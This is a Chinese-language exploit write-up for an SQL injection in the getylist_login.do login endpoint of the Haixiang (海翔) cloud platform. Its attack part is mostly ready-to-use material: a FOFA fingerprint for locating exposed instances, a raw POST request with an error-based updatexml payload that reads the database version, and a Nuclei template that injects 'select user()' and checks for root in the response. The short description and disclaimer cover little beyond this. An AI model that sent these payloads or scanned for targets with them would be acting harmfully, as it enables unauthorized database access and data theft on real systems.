文章目录
- 海翔云平台getylist_login.do接口 SQL注入漏洞复现 [附POC]
- 0x01 前言
- 0x02 漏洞描述
- 0x03 影响版本
- 0x04 漏洞环境
- 0x05 漏洞复现
- 1.访问漏洞环境
- 2.构造POC
- 3.复现
海翔云平台getylist_login.do接口 SQL注入漏洞复现 [附POC]
0x01 前言
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!
0x02 漏洞描述
海翔云平台的 getylist_login.do 存在 SQL 注入漏洞,攻击者可以通过在请求中注入恶意的 SQL 语句,导致数据库泄露、数据篡改或其他安全风险。建议立即修复此漏洞以防止潜在的攻击。
0x03 影响版本
海翔云平台
0x04 漏洞环境
FOFA语法:fid=“DFKq/loXsF8BN4n1UBeB1Q==”
0x05 漏洞复现
1.访问漏洞环境
2.构造POC
POC (POST)
POST /getylist_login.do HTTP/1.1
Host: ip:port
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 75
accountname=admin' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1);--
3.复现
发送查询数据库版本的数据包
Nuclei POC
id: haixiang-cloud-getylist-login-sql-injection
info:
name: 海翔云平台 getylist_login.do SQL 注入漏洞
author: rain
severity: high
description: |
海翔云平台的 getylist_login.do 存在 SQL 注入漏洞,攻击者可以通过在请求中注入恶意的 SQL 语句,导致数据库泄露、数据篡改或其他安全风险。建议立即修复此漏洞以防止潜在的攻击。
metadata:
fofa-query: fid="DFKq/loXsF8BN4n1UBeB1Q=="
requests:
- raw:
- |
POST /getylist_login.do HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 75
accountname=test' and (updatexml(1,concat(0x7e,(select user()),0x7e),1));--
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code == 500 && contains(body, "root@")'